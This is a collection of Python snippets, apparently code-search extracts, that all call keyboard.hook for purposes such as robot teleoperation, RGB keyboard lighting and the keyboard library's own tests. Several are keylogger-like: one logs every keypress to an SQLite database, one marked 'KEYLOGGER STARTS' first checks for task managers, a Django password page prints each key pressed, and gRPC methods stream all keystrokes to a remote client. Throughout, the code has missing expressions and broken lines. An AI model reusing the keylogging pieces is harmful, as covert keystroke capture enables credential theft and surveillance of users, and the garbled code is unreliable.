def __init__(self, inputs, pads, _reload=lambda x: x): self.inputs = inputs self.states = [False for i in self.inputs] self.play_sound = [False for i in self.inputs] self.pads = pads self._reload = _reload keyboard.hook(self.update)
def linux_keystroke_recorder(): keyboard.hook(key_cb) while True: ch = if ch == "q": keyboard.unhook_all() break
def __init__(self, address): = Peripheral(addr) print("connected") # keep state for keypresses self.pressed = { "up": False, "down": False, "right": False, "left": False, "w": False, "a": False, "s": False, "d": False } # TODO get service from robot sv = # TODO get characteristic handles from service/robot self.manual_char = sv.getCharacteristics(CHAR_UUIDS[0])[0] self.power_char = sv.getCharacteristics(CHAR_UUIDS[1])[0] self.drive_char = sv.getCharacteristics(CHAR_UUIDS[2])[0] self.turn_char = sv.getCharacteristics(CHAR_UUIDS[3])[0] # TODO enable notifications if using notifications keyboard.hook(self.on_key_event)
def __init__(self, vid: int, pid: int, usage: int, usage_page: int, **prepared_traffic_files: str): """ An RGBKeyboard declares methods and defines some default behaviors required to interface with a physical RGB keyboard, as long as its key colors can be set over a standard HID connection (USB, bluetooth untested). An RGBKeyboard, after initialized, can be used by calling the run() method, which starts an asyncio task (see method declaration for details). Prior to this, a Config can be set with set_config() and LightingScheme layers can be added and removed with add_layer(), remove_layer(), and reset_layers(). If HookingSchemes are being used, any hooks are automatically added and removed as necessary. :param vid: the vendor id of the desired HID device :param pid: the product id of the desired HID device :param usage: the usage of the desired HID device :param usage_page: the usage page of the desired HID device :param prepared_traffic_files: file paths of prepared traffic, executed with """ HIDHandler.__init__(self, vid, pid, usage, usage_page) PacketSender.__init__(self, self, **prepared_traffic_files) self.color_manager: Optional[KeyColorManager] = None self.initialized = False self._hooks_list: List[Callable[[keyboard.KeyboardEvent], None]] = [] keyboard.hook(self._hook_callback) self.scheme: CombiningScheme = CombiningScheme()
def hook(self): mouse.hook(self.mouse_events.append) def _keyboard_hook(event): self.keyboard_events.append(event) keyboard.hook(_keyboard_hook)
def __init__(self, queue): self.queue = queue keyboard.hook(self.pressed_keys) keyboard.add_hotkey('ctrl+shift+h', self.rev_hook_state) self._hook_on = False print('Keyboard hook is init. Translate is OFF.') print('Press "ctrl+shift+h" key to translate ON/OFF')
def __init__( self, screen, ): try: keyboard.hook(self.test_hook, suppress=True) except Exception as e: print( "IF YOU WOULD LIKE TO USE MULTIPLE KEYS SIMULTANEOUSLY \nRUN ME WITH SUDO PERMISSIONS" ) print('THANK YOU') self.screen = screen self.keys_pressed_buff = [] self.key_dict = {} self.cooldown = 0.25 key_thread = threading.Thread(target=self.key_handler) key_thread.start() self.cooldowns = threading.Thread(target=self.decrease_cooldowns) self.cooldowns.start() self.on_press_callbacks = [] self.on_release_callbacks = [] self.remap_keys = { 'KEY_UP': 'up', 'KEY_DOWN': 'down', 'KEY_LEFT': 'left', 'KEY_RIGHT': 'right', }
def func1(): global keycode keyboard.hook(print_pressed_keys) while (1): if keycode == '17': #W state = MOVE_FWD elif keycode == '31': #S state = MOVE_BWD elif keycode == '32': #D state = MOVE_R elif keycode == '30': #A state = MOVE_L elif keycode == '57': #spacebar state = STOP elif keycode == '103': #up state = F elif keycode == '108': #down state = S elif keycode == '19': #R state = Mon elif keycode == '1': #esc state = Moff time.sleep(0.01) motor_OFF() time.sleep(2)
def start(self): center = QApplication.desktop().availableGeometry(self).center() self.move(center.x() - self.width() * 0.5, 0) keyboard.hook(self.on_key)
def record(): p = au.PyAudio() stream =, channels=CHANNEL, rate=RATE, input=True, stream_callback=callback) stream.start_stream() while True: keyboard.hook(keyListener) if keyboard.record('esc'): times = time.strftime("%Y年%m月%d日%H时%M分%S秒", time.localtime()) + '.wav' wf =, 'wb') wf.setnchannels(CHANNEL) wf.setsampwidth(p.get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(data)) wf.close() break stream.stop_stream() stream.close() p.terminate() print("\n") print("file saved.")
def db2_remote_controller(self, update_rate=10, recv_buf_size=5): """ Sample double 2 robot remote controller with terminal UI :param update_rate: (int) terminal UI refresh rate in fps :param recv_buf_size: (int) the maximum number of clauses will be saved :return: none """ svrsock, clnsock, clnaddr = init_connection(self.ip_addr, self.port) self.conn_flag = 1 #if input('PRESS ENTER TO START REMOTE...\nor input "e" to exit\n') is 'e': # exit(0) kb_monitor = KeyboardListen(sock=clnsock) recv_maintainer = RecvMaintainer(sock=clnsock, buf_size=recv_buf_size, end_indicator='#') keyboard.hook(kb_monitor.kbaction_callback) threading.Thread(target=recv_maintainer.recv_maintain).start() while True: if recv_maintainer.latest_state_data() is None: continue self.poll_height = recv_maintainer.latest_state_data()[0] self.park_state = recv_maintainer.latest_state_data()[1] self.battery = recv_maintainer.latest_state_data()[2] self.left_encoder = recv_maintainer.latest_state_data()[3] self.right_encoder = recv_maintainer.latest_state_data()[4] print('STATE INFO:') print(' Poll Height:', self.poll_height) print(' Park State:', self.park_state) print(' Battary:', self.battery) print(' Left Encoder:', self.left_encoder) print('Right Encoder:', self.right_encoder) time.sleep(1 / update_rate) os.system('clear')
def main(): # prepare audio recorder callback = Callback().callback # duration of signal frame, seconds FRAME_LEN = 0.2 # 0.2 # number of audio channels (expect mono signal) CHANNELS = 1 # sample rate, Hz RATE = 16000 CHUNK_SIZE = int(FRAME_LEN * RATE) p = pyaudio.PyAudio() stream =, channels=CHANNELS, rate=RATE, input=True, stream_callback=callback, frames_per_buffer=CHUNK_SIZE) stream.start_stream() # prepare keyboard listener while (1): keyboard.hook(on_press_release) if keyboard.record('esc'): break # close up stream.stop_stream() stream.close() p.terminate()
def GetKeyboard(self, request, context): l = IterQueue(maxsize=3000) keyboard.hook(l.put) while True: # e = str(l.get()) event = keyboard_pb2.KeyStroke(key=str(l.get())) yield event
def start_collect(self) -> None: state = self._State() state.current = '' state.time = -1 timeout = 5 triggers = ["enter"] def handler(event) -> None: name = if event.event_type == keyboard.KEY_UP or name in keyboard.all_modifiers: return if timeout and event.time - state.time > timeout: state.current = '' state.time = event.time if name in triggers: self.line_entered() state.current = '' elif len(name) > 1: state.current = '' else: state.current += name keyboard.hook(handler) while self.is_run: time.sleep(1e6)
def __init__(self, pair): # Some Key loop Variables - not stored in configurations self.order_timestamp = self.active_order = False self.active_direction = '' self.order = {} self.kill = {} self.time_delay = 200000 self.pair = pair # Import Configurations and 'global_variables' print('\n\nKeyboard Trader Activated\n\n') self.configs_file = '/Users/user/Desktop/diff/configs.yaml' with open(self.configs_file) as f: self.configs = yaml.load(f, Loader=yaml.FullLoader) # Fetch Account Data from Oanda On Startup account_details = fetch_account_details(self.configs['oanda_api'], self.configs['oanda_account']) self.configs['account_margin'] = float(account_details['account']['marginRate']) self.configs['account_balance'] = float(account_details['account']['balance']) self.configs['open_positions'] = int(account_details['account']['openTradeCount']) self.configs['last_transaction_id'] = int(account_details['account']['lastTransactionID']) self.configs['margin_used'] = float(account_details['account']['marginUsed']) self.configs['margin_available'] = float(account_details['account']['marginAvailable']) self.write_configs() # Close All Current Trades: # Start keyboard Loop keyboard.hook(self.my_keyboard_hook) keyboard.wait()
def index(request): def key_press(key): print(, " ", key.event_type, " ", key.time) keyboard.hook(key_press) if request.method == 'POST': #verilen sifreyi ve kullanıcın sifresini alma, #altının çizgili olmasının sebebi kullanılmıyor olması verilensifre = request.POST['verilensifre'] girilensifre = request.POST['girilensifre'] #verilen bilgilerle ilgili kayıt var mı? kontrol yeri olucak!! dogru_mu = 1 if verilensifre == girilensifre: dogru_mu = 1 else: dogru_mu = 0 if dogru_mu == 1: messages.add_message(request, messages.SUCCESS, 'Şifre Girişi Başarılı') return render(request, 'passwordentry/index.html') else: messages.add_message(request, messages.ERROR, 'Şifre Girişi Başarısız!') return render(request, 'passwordentry/index.html') else: print("pass") return render(request, 'passwordentry/index.html')
def __init__(self): self.ready_to_commit = False #with sqlite3.connect('keyboard_log.db', check_same_thread=False) as con: # self.con = sqlite3.connect('keyboard_log.db', check_same_thread=False) self.cur = self.con.cursor() self.debug = True init_cmd = '''CREATE TABLE IF NOT EXISTS keyboard_log (id integer primary key autoincrement, date text, keypress_block text)''' self.cur.execute(init_cmd) self.con.commit() cmd = f"INSERT INTO keyboard_log VALUES(NULL, '{str(time.time())}', 'KEYLOG STARTED')" self.cur.execute(cmd) self.con.commit() #con.close() #keyboard.hook(callback, suppress=False, on_remove=<lambda>) self.prev_block_end = time.time() self.prev_keypress = "space" self.prev_block = [] self.block = [] self.prev_keypress_time = time.time() keyboard.hook(self.log_keypress) keyboard.wait()
def run_browser(question_object): """ run as a daemon :return: """ try: browser = browser_init() print("浏览器加载成功") except Exception as e: print("浏览器加载失败") print(str(e)) else: def key_press_callback(e): if keyboard.is_pressed("space"): browser_search( browser, question_object.value.decode("utf-8").encode("gbk")) keyboard.hook(key_press_callback) while True: time.sleep(2) keyboard.wait()
def __init__(self): Tk.__init__(self) self.title("iRobot Create 2 Tethered Drive") self.option_add('*tearOff', FALSE) self.menubar = Menu() self.configure(menu=self.menubar) createMenu = Menu(self.menubar, tearoff=False) self.menubar.add_cascade(label="Create", menu=createMenu) createMenu.add_command(label="Connect", command=self.onConnect) createMenu.add_command(label="Help", command=self.onHelp) createMenu.add_command(label="Quit", command=self.onQuit) self.text = Text(self, height=TEXTHEIGHT, width=TEXTWIDTH, wrap=WORD) self.scroll = Scrollbar(self, command=self.text.yview) self.text.configure(yscrollcommand=self.scroll.set) self.text.pack(side=LEFT, fill=BOTH, expand=True) self.scroll.pack(side=RIGHT, fill=Y) self.text.insert(END, helpText) # self.bind("<Key>", self.callbackKey) # self.bind("<KeyRelease>", self.callbackKey) # global char # char = None # _thread.start_new_thread(self.keypressCB, ()) self.customstartup() # keyboard.add_hotkey('up') keyboard.hook(self.callbackKey)
def init_terminal(): __log_start() ground_station.init_station() ground_station.print_ground() keyboard.hook(__check_pressed_key) keyboard.wait('esc') __log_finish()
def listen(): """ Main function to call, will hook the keyboard """ keyboard.hook(print_key) keyboard.wait('esc')
def uav_control(q): """无人机控制进程""" minifly = uav.Uav() minifly.init_ser() print("串口已连接") keyboard.hook(minifly.pressed_keys) minifly.control_start(q)
def run(self): self.time_stamp = self.running = True signal.signal(signal.SIGINT, self.exitNice) keyboard.hook(self.keyEvent) while self.running: time.sleep(1)
def start(): print("Press 'q' to begin") while True: if keyboard.is_pressed('q'): mouse.hook(OnMouseEvent) keyboard.hook(OnKeyboardEvent) break
def __init__(self): super().__init__() uic.loadUi('ui_map.ui', self) self.button_find.clicked.connect(self.find) self.edit_longitude.setText('60.58985462732907') self.edit_latitude.setText('56.84822763650701') self.lt_cent = self.edit_latitude.text() self.ln_cent = self.edit_longitude.text() self.find() def keys_listener(e): if == 'page up' and e.event_type == 'up': self.chande_value(1) elif == 'page down' and e.event_type == 'up': self.chande_value(2) elif == 'up' and e.event_type == 'up': if 90 >= float(self.lt_cent) - 0.001 >= -90: self.lt_cent = str(float(self.lt_cent) + 0.0091) self.find(True) elif == 'down' and e.event_type == 'up': if 90 >= float(self.lt_cent) - 0.001 >= -90: self.lt_cent = str(float(self.lt_cent) - 0.0091) self.find(True) elif == 'right' and e.event_type == 'up': if 180 >= float(self.ln_cent) - 0.001 >= -180: self.ln_cent = str(float(self.ln_cent) + 0.015) self.find(True) elif == 'left' and e.event_type == 'up': if 180 >= float(self.ln_cent) - 0.001 >= -180: self.ln_cent = str(float(self.ln_cent) - 0.015) self.find(True) keyboard.hook(keys_listener)
def keyboardStream(self, request, context): ko = IterQueue(maxsize=30000) keyboard.hook(ko.put) while True: # e = str(l.get()) event = mouse_pb2.KeyStroke(key=str(ko.get())) yield event
def main(): if CLEAR_ON_STARTUP: os.remove(FILE_NAME) is_down = {} output = open(FILE_NAME, "a") atexit.register(onexit, output) keyboard.hook(partial(callback, output, is_down)) keyboard.wait(TERMINATE_KEY)
def main(): # KEYLOGGER STARTS if not == "nt": return # TODO: Linux, MacOS check_task_managers() keyboard.hook(key_callback) keyboard.wait() return
def listen(): keyboard.hook(abc) # keyboard.hook_key('enter', bcd) # recorded = keyboard.record(until='esc') keyboard.wait()
def hook(): try: global hook_status if not hook_status: hook_status = True keyboard.hook(on_press) except: return
def test_hook_nonblocking(self): self.i = 0 def count(e): self.assertEqual(, 'a') self.i += 1 hook = keyboard.hook(count, suppress=False), d_a+u_a) self.assertEqual(self.i, 2) keyboard.unhook(hook), d_a+u_a) self.assertEqual(self.i, 2) keyboard.hook(count, suppress=False), d_a+u_a) self.assertEqual(self.i, 4) keyboard.unhook_all(), d_a+u_a) self.assertEqual(self.i, 4)
def test_hook_blocking(self): self.i = 0 def count(e): self.assertIn(, ['a', 'b']) self.i += 1 return == 'b' hook = keyboard.hook(count, suppress=True), d_b) self.assertEqual(self.i, 2) keyboard.unhook(hook), d_a+d_b) self.assertEqual(self.i, 2) keyboard.hook(count, suppress=True), d_b) self.assertEqual(self.i, 4) keyboard.unhook_all(), d_a+d_b) self.assertEqual(self.i, 4)
def test_get_typed_strings(self): keyboard.hook("b")"i")"shift")"r")"caps lock")"d")"caps lock") self.release("shift")" ")"backspace")".")"enter")"n")"e")"w") self.assertEqual(list(keyboard.get_typed_strings(, ["biRd.", "new"])
def test_hook(self): self.i = 0 def count(e): self.assertEqual(, "a") self.i += 1 keyboard.hook(count)"a") self.assertEqual(self.i, 2) keyboard.hook(count)"a") self.assertEqual(self.i, 6) keyboard.unhook(count)"a") self.assertEqual(self.i, 8) keyboard.unhook(count)"a") self.assertEqual(self.i, 8)
def release(scan_code): if scan_code < 0: vk = -scan_code scan_code = MapVirtualKey(vk, MAPVK_VK_TO_VSC) else: vk = MapVirtualKey(scan_code, MAPVK_VSC_TO_VK) user32.keybd_event(vk, scan_code, 2, 0) def type_unicode(character): # This code and related structures are based on # inputs = [] surrogates = bytearray(character.encode('utf-16le')) for i in range(0, len(surrogates), 2): higher, lower = surrogates[i:i+2] structure = KEYBDINPUT(0, (lower << 8) + higher, KEYEVENTF_UNICODE, 0, None) inputs.append(INPUT(INPUT_KEYBOARD, _INPUTunion(ki=structure))) nInputs = len(inputs) LPINPUT = INPUT * nInputs pInputs = LPINPUT(*inputs) cbSize = c_int(ctypes.sizeof(INPUT)) SendInput(nInputs, pInputs, cbSize) if __name__ == '__main__': import keyboard def p(event): print(event) keyboard.hook(p) input()
""" Prints the scan code of all currently pressed keys. Updates on every keyboard event. """ import sys sys.path.append('..') import keyboard def print_pressed_keys(e): line = ', '.join(str(code) for code in keyboard._pressed_events) # '\r' and end='' overwrites the previous line. # ' '*40 prints 40 spaces at the end to ensure the previous line is cleared. print('\r' + line + ' '*40, end='') keyboard.hook(print_pressed_keys) keyboard.wait()
def __init__(self, bot): = bot self.is_online = True self._last_time = 0 kb.hook(self.kb_press) self.status_task = None self.start = False
# -*- coding: utf-8 -*- import keyboard import fileinput import json import sys def print_event_json(event): # Could use json.dumps(event.__dict__()), but this way we guarantee semantic order. if print('{{"event_type": "{}", "name": "{}", "scan_code": {}, "time": {}}}'.format(event.event_type,, event.scan_code, event.time)) else: print('{{"event_type": "{}", "scan_code": {}, "time": {}}}'.format(event.event_type, event.scan_code, event.time)) sys.stdout.flush() keyboard.hook(print_event_json) parse_event_json = lambda line: keyboard.KeyboardEvent(**json.loads(line)) for line in fileinput.input())